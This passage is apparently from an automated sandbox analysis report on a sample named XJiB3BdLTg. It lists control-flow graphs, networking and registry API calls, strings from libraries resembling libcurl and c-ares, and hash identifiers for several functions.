1812->1825 1826 1d0882-1d088d 1813->1826 1814->1815 1819 1d079c-1d07c2 call 1c76a0 1814->1819 1815->1802 1817->1778 1832 1d0a87-1d0a97 call 1d6df0 1817->1832 1819->1815 1824->1778 1825->1813 1829 1d0854-1d085f 1825->1829 1830 1d0970-1d0975 1826->1830 1831 1d0893-1d08b1 1826->1831 1829->1826 1833 1d0a19-1d0a2c 1830->1833 1834 1d097b-1d0989 call 1c70b0 1830->1834 1835 1d08c8-1d08f7 1831->1835 1832->1778 1833->1803 1834->1833 1842 1d098f-1d099e 1834->1842 1843 1d08fd-1d0925 1835->1843 1844 1d08f9-1d08fb 1835->1844 1845 1d09b0-1d09c1 call 1c70d0 1842->1845 1846 1d0928-1d093f 1843->1846 1844->1846 1852 1d09a0-1d09ae call 1c70e0 1845->1852 1853 1d09c3-1d09c7 1845->1853 1850 1d0945-1d096b 1846->1850 1851 1d08b3-1d08c2 1846->1851 1850->1851 1851->1830 1851->1835 1852->1833 1852->1845 1855 1d09e8-1d0a03 WSAEnumNetworkEvents 1853->1855 1856 1d0a05-1d0a17 1855->1856 1857 1d09d0-1d09e6 WSAEventSelect 1855->1857 1856->1857 1857->1852 1857->1855
                                          APIs
                                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 001D0712
                                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001D09DC
                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001D09FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: EventSelect$EnumEventsNetwork
                                          • String ID: multi.c
                                          • API String ID: 2170980988-214371023
                                          • Opcode ID: 6db8ed2ff3d0ea0a4e8df0f2c1f79908417a86e5fbab9ef886119bf13b93e685
                                          • Instruction ID: ecab106f31d40b378567f4f8d7b3e88065dfafb8c8a1ca71079c717b78889255
                                          • Opcode Fuzzy Hash: 6db8ed2ff3d0ea0a4e8df0f2c1f79908417a86e5fbab9ef886119bf13b93e685
                                          • Instruction Fuzzy Hash: FCD1AE756083019FE712DF64C891BAFB7E5FF98348F04482EF98486242E7B4E958DB52
                                          Function 001D6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1896 1d6fa0-1d6fd2 1897 1d6feb-1d6ff1 1896->1897 1898 1d6fd4-1d6fd6 1896->1898 1900 1d7324-1d7330 1897->1900 1901 1d6ff7-1d6ff9 1897->1901 1899 1d6fe0-1d6fe4 1898->1899 1902 1d701b-1d7041 1899->1902 1903 1d6fe6-1d6fe9 1899->1903 1904 1d6fff-1d7016 1901->1904 1905 1d7186-1d7196 1901->1905 1906 1d7060-1d7074 1902->1906 1903->1897 1903->1899 1904->1900 1905->1900 1907 1d7057-1d705a 1906->1907 1908 1d7076-1d7081 1906->1908 1907->1906 1912 1d7172-1d7174 1907->1912 1908->1907 1911 1d7083-1d7089 1908->1911 1913 1d70dc-1d70df 1911->1913 1914 1d708b-1d708f 1911->1914 1915 1d719b-1d71a8 1912->1915 1916 1d7176-1d7184 1912->1916 1921 1d712c-1d7132 1913->1921 1922 1d70e1-1d70e5 1913->1922 1919 1d7091 1914->1919 1920 1d70b0-1d70bd 1914->1920 1917 1d71aa-1d71be 1915->1917 1918 1d71f1-1d722d call 1dd7f0 select 1915->1918 1916->1918 1923 1d730d-1d7310 1917->1923 1924 1d71c4-1d71c6 1917->1924 1946 1d730b 1918->1946 1947 1d7233-1d723e 1918->1947 1925 1d70a0-1d70a7 1919->1925 1928 1d70bf-1d70ce 1920->1928 1929 1d70d5 1920->1929 1921->1907 1926 1d7138-1d713c 1921->1926 1930 1d70e7 1922->1930 1931 1d7100-1d710d 1922->1931 1923->1900 1940 1d7312-1d7322 1923->1940 1934 1d71cc-1d71e6 1924->1934 1935 1d7331-1d7344 1924->1935 1925->1920 1936 1d70a9-1d70ac 1925->1936 1937 1d714d-1d715a 1926->1937 1938 1d713e 1926->1938 1928->1929 1929->1913 1941 1d70f0-1d70f7 1930->1941 1932 1d710f-1d711e 1931->1932 1933 1d7125 1931->1933 1932->1933 1933->1921 1934->1900 1956 1d71ec 1934->1956 1935->1900 1955 1d7346 1935->1955 1936->1925 1942 1d70ae 1936->1942 1944 1d7050 1937->1944 1945 1d7160-1d716d 1937->1945 1943 1d7140-1d7144 1938->1943 1940->1900 1941->1931 1948 1d70f9-1d70fc 1941->1948 1942->1920 1943->1937 1951 1d7146-1d7149 1943->1951 1944->1907 1945->1944 1946->1923 1952 1d725c-1d7269 1947->1952 1948->1941 1954 1d70fe 1948->1954 1951->1943 1957 1d714b 1951->1957 1958 1d726b-1d727b __WSAFDIsSet 1952->1958 1959 1d7253-1d7256 1952->1959 1954->1931 1955->1940 1956->1940 1957->1937 1960 1d727d-1d7287 1958->1960 1961 1d729a-1d72ac __WSAFDIsSet 1958->1961 1959->1900 1959->1952 1962 1d728e-1d7293 1960->1962 1963 1d7289 1960->1963 1964 1d72ae-1d72b3 1961->1964 1965 1d72ba-1d72c9 __WSAFDIsSet 1961->1965 1962->1961 1966 1d7295 1962->1966 1963->1962 1964->1965 1967 1d72b5 1964->1967 1968 1d72cf-1d72f6 1965->1968 1969 1d7240 1965->1969 1966->1961 1967->1965 1970 1d72fc-1d7306 1968->1970 1971 1d7245-1d724c 1968->1971 1969->1971 1970->1971 1971->1959
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 837082a8d244d90011d01ba18bfd7951b405cbfe5cb2110e1d98c7cadfb9fecf
                                          • Instruction ID: c8c2ca137ed6c760839f77afb3261912e6504c48919f434c42dd170553d00a7b
                                          • Opcode Fuzzy Hash: 837082a8d244d90011d01ba18bfd7951b405cbfe5cb2110e1d98c7cadfb9fecf
                                          • Instruction Fuzzy Hash: C891F03160C34A4BD7358A2888D47BBB2D5FFC5764F548B2EE8A9422D4FB75AC40D681
                                          Function 0028B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1972 28b180-28b195 1973 28b19b-28b1a2 1972->1973 1974 28b3e0-28b3e7 1972->1974 1975 28b1b0-28b1b9 1973->1975 1975->1975 1976 28b1bb-28b1bd 1975->1976 1976->1974 1977 28b1c3-28b1d0 1976->1977 1979 28b3db 1977->1979 1980 28b1d6-28b1f2 1977->1980 1979->1974 1981 28b229-28b22d 1980->1981 1982 28b3e8-28b417 1981->1982 1983 28b233-28b246 1981->1983 1991 28b41d-28b429 1982->1991 1992 28b582-28b589 1982->1992 1984 28b248-28b24b 1983->1984 1985 28b260-28b264 1983->1985 1986 28b24d-28b256 1984->1986 1987 28b215-28b223 1984->1987 1989 28b269-28b286 call 28af30 1985->1989 1986->1989 1987->1981 1990 28b315-28b33c call 548b00 1987->1990 1999 28b288-28b2a3 call 28b060 1989->1999 2000 28b2f0-28b301 1989->2000 2006 28b3bf-28b3ca 1990->2006 2007 28b342-28b347 1990->2007 1996 28b42b-28b433 call 28b590 1991->1996 1997 28b435-28b44c call 28b590 1991->1997 1996->1997 2011 28b458-28b471 call 28b590 1997->2011 2012 28b44e-28b456 call 28b590 1997->2012 2017 28b2a9-28b2c7 getsockname call 28b020 1999->2017 2018 28b200-28b213 call 28b020 1999->2018 2000->1987 2021 28b307-28b310 2000->2021 2013 28b3cc-28b3d9 2006->2013 2008 28b349-28b358 2007->2008 2009 28b384-28b38f 2007->2009 2015 28b360-28b382 2008->2015 2009->2006 2016 28b391-28b3a5 2009->2016 2030 28b48c-28b4a7 2011->2030 2031 28b473-28b487 2011->2031 2012->2011 2013->1974 2015->2009 2015->2015 2022 28b3b0-28b3bd 2016->2022 2028 28b2cc-28b2dd 2017->2028 2018->1987 2021->2013 2022->2006 2022->2022 2028->1987 2032 28b2e3 2028->2032 2033 28b4a9-28b4b1 call 28b660 2030->2033 2034 28b4b3-28b4cb call 28b660 2030->2034 2031->1992 2032->2021 2033->2034 2039 28b4d9-28b4f5 call 28b660 2034->2039 2040 28b4cd-28b4d5 call 28b660 2034->2040 2045 28b50d-28b52b call 28b770 * 2 2039->2045 2046 28b4f7-28b50b 2039->2046 2040->2039 2045->1992 2051 28b52d-28b531 2045->2051 2046->1992 2052 28b580 2051->2052 2053 28b533-28b53b 2051->2053 2052->1992 2054 28b578-28b57e 2053->2054 2055 28b53d-28b547 2053->2055 2054->1992 2055->2054 2056 28b549-28b54d 2055->2056 2056->2054 2057 28b54f-28b558 2056->2057 2057->2054 2058 28b55a-28b576 call 28b870 * 2 2057->2058 2058->1992 2058->2054
                                          APIs
                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0028B2B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                          • API String ID: 3358416759-2430778319
                                          • Opcode ID: cc9539f4c66383c93b945f775430b507412d015b5aaa518290fc7f188625ad21
                                          • Instruction ID: d59fbc907c88c61ce212c555022bb91f618da187adac79aff94d16c3b4006f69
                                          • Opcode Fuzzy Hash: cc9539f4c66383c93b945f775430b507412d015b5aaa518290fc7f188625ad21
                                          • Instruction Fuzzy Hash: 66C18F396163059FD719EF24C891A6A77E1FF88304F44886CE8498B3E2DB34ED55CB81
                                          Function 0028A870 Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • recv.WS2_32(000000FF,00276F4E,000000FF,00000000,00000000,000000FF,00276F4E,000000FF,?,00000000,?), ref: 0028A8AF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 236d0902a9c238bc2fbc09ae54f956c4660593a8c8b644978c6eed93953b423b
                                          • Instruction ID: 295958ccc8ea7bc48f04c356b032b1a8a116884709a97fc50030165b95d2e148
                                          • Opcode Fuzzy Hash: 236d0902a9c238bc2fbc09ae54f956c4660593a8c8b644978c6eed93953b423b
                                          • Instruction Fuzzy Hash: 42F01C76B157216BE5249A18EC05FABF369EBC4B20F148A19B944672888760BC1187E2
                                          Function 0027A440 Relevance: 48.3, APIs: 17, Strings: 10, Instructions: 1066registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0027AA19
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0027AA4C
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0027AA97
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0027AAE9
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0027AB30
                                          • RegCloseKey.KERNELBASE(?), ref: 0027AB6A
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0027AB82
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0027AC46
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0027AD0A
                                          • RegEnumKeyExA.KERNELBASE ref: 0027AD8D
                                          • RegCloseKey.KERNELBASE(?), ref: 0027ADD9
                                          • RegEnumKeyExA.KERNELBASE ref: 0027AE08
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0027AE2A
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0027AE54
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0027AF63
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0027AFB2
                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0027B072
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: QueryValue$Open$CloseEnum
                                          • String ID: ;m}$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$ck}
                                          • API String ID: 4217438148-1944670311
                                          • Opcode ID: 81c3226d45951e61349359ca3c3f970d0945772ecc331e9e340de1fa30cf3f4d
                                          • Instruction ID: 0a8aa5e9ae138c5b0785f7cb7d5ffe8cf580d23deaf7950553ec5a88f90d5a9f
                                          • Opcode Fuzzy Hash: 81c3226d45951e61349359ca3c3f970d0945772ecc331e9e340de1fa30cf3f4d
                                          • Instruction Fuzzy Hash: 3572D0B1614302ABE3109F24CC81F6B7BE8AF85754F148828F989DB291E7B5E954CB53
                                          Function 001FA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                          Download Yara Rule
                                          APIs
                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 001FA831
                                          Strings
                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 001FADAC
                                          • Could not set TCP_NODELAY: %s, xrefs: 001FA871
                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 001FAD0A
                                          • bind failed with errno %d: %s, xrefs: 001FB080
                                          • Trying %s:%d..., xrefs: 001FA7C2, 001FA7DE
                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 001FAE1F
                                          • cf-socket.c, xrefs: 001FA5CD, 001FA735
                                          • Local port: %hu, xrefs: 001FAF28
                                          • Trying [%s]:%d..., xrefs: 001FA689
                                          • @, xrefs: 001FAC42
                                          • Local Interface %s is ip %s using address family %i, xrefs: 001FAE60
                                          • Bind to local port %d failed, trying next, xrefs: 001FAFE5
                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 001FA6CE
                                          • cf_socket_open() -> %d, fd=%d, xrefs: 001FA796
                                          • @, xrefs: 001FA8F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                          • API String ID: 3981526788-2373386790
                                          • Opcode ID: 24ac42749133fc48062a6167c4fc8e848234eff0eb29468b08a50c83061be91b
                                          • Instruction ID: 79a14b10dfef8064b60874d0f10d94225c27bcce44616c854b8d8d3ce410210b
                                          • Opcode Fuzzy Hash: 24ac42749133fc48062a6167c4fc8e848234eff0eb29468b08a50c83061be91b
                                          • Instruction Fuzzy Hash: 7E62F3B1508345ABE724CF24C886BBBB7E4AF90314F444919FA8C97292E775E845CB93
                                          Function 00289740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 943 289740-28975b 944 28975d-289768 call 2878a0 943->944 945 289780-289782 943->945 954 2899bb-2899c0 944->954 955 28976e-289770 944->955 946 289788-2897a0 call 548e00 call 2878a0 945->946 947 289914-28994e call 548b70 RegOpenKeyExA 945->947 946->954 961 2897a6-2897c5 946->961 958 28995a-289992 RegQueryValueExA RegCloseKey call 548b98 947->958 959 289950-289955 947->959 956 289a0c-289a15 954->956 960 289772-28977e 955->960 955->961 973 289997-2899b5 call 2878a0 958->973 959->956 960->946 966 289827-289833 961->966 967 2897c7-2897e0 961->967 969 28985f-289872 call 285ca0 966->969 970 289835-28985c call 27e2b0 * 2 966->970 971 2897e2-2897f3 call 548b50 967->971 972 2897f6-289809 967->972 983 289878-28987d call 2877b0 969->983 984 2899f0 969->984 970->969 971->972 972->966 982 28980b-289810 972->982 973->954 973->961 982->966 986 289812-289822 982->986 990 289882-289889 983->990 989 2899f5-2899fb call 285d00 984->989 986->956 997 2899fe-289a09 989->997 990->989 994 28988f-28989b call 274fe0 990->994 994->984 1002 2898a1-2898c3 call 548b50 call 2878a0 994->1002 997->956 1007 2898c9-2898db call 27e2d0 1002->1007 1008 2899c2-2899ed call 27e2b0 * 2 1002->1008 1007->1008 1012 2898e1-2898f0 call 27e2d0 1007->1012 1008->984 1012->1008 1018 2898f6-289905 call 2863f0 1012->1018 1023 28990b-28990f 1018->1023 1024 289f66-289f7f call 285d00 1018->1024 1026 289a3f-289a5a call 286740 call 2863f0 1023->1026 1024->997 1026->1024 1032 289a60-289a6e call 286d60 1026->1032 1035 289a1f-289a39 call 286840 call 2863f0 1032->1035 1036 289a70-289a94 call 286200 call 2867e0 call 286320 1032->1036 1035->1024 1035->1026 1047 289a16-289a19 1036->1047 1048 289a96-289ac6 call 27d120 1036->1048 1047->1035 1049 289fc1 1047->1049 1054 289ac8-289adb call 27d120 1048->1054 1055 289ae1-289af7 call 27d190 1048->1055 1051 289fc5-289ffd call 285d00 call 27e2b0 * 2 1049->1051 1051->997 1054->1035 1054->1055 1055->1035 1061 289afd-289b09 call 274fe0 1055->1061 1061->1049 1067 289b0f-289b29 call 27e730 1061->1067 1072 289b2f-289b3a call 2878a0 1067->1072 1073 289f84-289f88 1067->1073 1072->1073 1080 289b40-289b54 call 27e760 1072->1080 1075 289f95-289f99 1073->1075 1077 289f9b-289f9e 1075->1077 1078 289fa0-289fb6 call 27ebf0 * 2 1075->1078 1077->1049 1077->1078 1089 289fb7-289fbe 1078->1089 1086 289f8a-289f92 1080->1086 1087 289b5a-289b6e call 27e730 1080->1087 1086->1075 1093 289b8c-289b97 call 2863f0 1087->1093 1094 289b70-28a004 1087->1094 1089->1049 1102 289c9a-289cab call 27ea00 1093->1102 1103 289b9d-289bbf call 286740 call 2863f0 1093->1103 1098 28a015-28a01d 1094->1098 1100 28a01f-28a022 1098->1100 1101 28a024-28a045 call 27ebf0 * 2 1098->1101 1100->1051 1100->1101 1101->1051 